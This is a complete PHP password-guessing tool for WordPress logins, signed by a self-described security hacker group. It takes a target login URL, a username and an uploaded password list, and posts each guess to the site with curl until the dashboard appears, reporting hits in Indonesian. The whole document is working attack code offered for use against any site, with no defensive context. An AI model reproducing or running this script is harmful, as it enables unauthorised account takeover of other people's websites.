WordPress Bruteforce

1. <?php
2. // ============================= //
3. # WordPress Brute Force
4. # Created by Lyonc
5. # Garuda Security Hacker
6. # Can Use On Localhost / cPanel
7. // ============================= //
8.  
9. error_reporting(0);
10.  
11. $logurl = $_POST['logurl'];
12. $user = $_POST['tguser'];
13.  
14. echo '<head>
15. <meta name="viewport" content="width=device-width, initial-scale=1.0">
16. <title>WordPress Brute Force</title>
17. </head>
18. <body>
19. <center>
20. ';
21.  
22. if(isset($_POST['startbf']) && !empty($logurl) && !empty($user) && $_FILES['netfile']['size'] !== 0){
23. $textkskc = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123457890';
24. $panj = 15;
25. $txtl = strlen($textkskc)-1;
26. $uploadz = '';
27. for($i=1; $i<=$panj; $i++){
28. $uploadz .= $textkskc[rand(0, $txtl)];
29. }
30. if(move_uploaded_file($_FILES['netfile']['tmp_name'], $uploadz)){
31. $passlists = file_get_contents($uploadz);
32. unlink($uploadz);
33. }else{
34. $passlists = '';
35. }
36. $listspass = explode("\n", $passlists);
37. if(isset($_POST['brift'])){
38. foreach($listspass as $pass){
39. if(logwp($logurl, urlencode($user), urlencode($pass))){
40. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">Berhasil</font><br/>'."\n";
41. break;
42. }else{
43. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">Gagal :(</font><br/>'."\n";
44. }
45. }
46. }else{
47. foreach($listspass as $pass){
48. if(logwp($logurl, urlencode($user), urlencode($pass))){
49. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">Berhasil Bos !!!</font><br/>'."\n";
50. }else{
51. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">Gagal</font><br/>'."\n";
52. }
53. }
54. }
55. }else{
56. echo '<form method="post" enctype="multipart/form-data">
57. <b><font size="6" color="indigo">WordPress Brute Force</font></b><br/>
58. <font color="gray">Work On cPanel And Localhost</font><br/>
59. <b>Login Url</b><br/>
60. <input type="text" size="40" name="logurl" placeholder="Login Url" value="'.htmlspecialchars($user).'"><br/>
61. <b>Username</b><br/>
62. <input type="text" size="40" name="tguser" placeholder="Username" value="'.htmlspecialchars($user).'"><br/>
63. <b>Password Lists</b><br/>
64. <input type="file" name="netfile"><br/>
65. <input type="checkbox" name="brift" value="Break If True"><font color="blue">Break If True</font><br/>
66. <input type="submit" name="startbf" value="START">
67. </form>
68. ';
69. }
70.  
71. echo '</center>
72. </body>';
73.  
74. function logwp($urllgz, $login_email, $login_pass){
75. $urllgm = explode('?redirect_to=', $urllgz);
76. $urllg = $urllgm[0];
77. $cookielog = 'gsh_cookie';
78. $fp = fopen($cookielog, 'w');
79. fwrite($fp, '');
80. fclose($fp);
81. $ch = curl_init();
82. curl_setopt($ch, CURLOPT_URL, $urllg);
83. curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.$login_email.'&pwd='.$login_pass.'&login=Log%20In');
84. curl_setopt($ch, CURLOPT_POST, 1);
85. curl_setopt($ch, CURLOPT_HEADER, 0);
86. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
87. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookielog);
88. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookielog);
89. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
90. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
91. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
92. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3');
93. curl_setopt($ch, CURLOPT_REFERER, $urllg);
94. $page = curl_exec($ch) or die('<font color="red">Can\'t Connect to Host</font>');
95. if(eregi('\'#dashboard_stats div.dashboard-widget-content\'', $page)){
96. return TRUE;
97. }else{
98. return FALSE;
99. }
100. }
101. ?>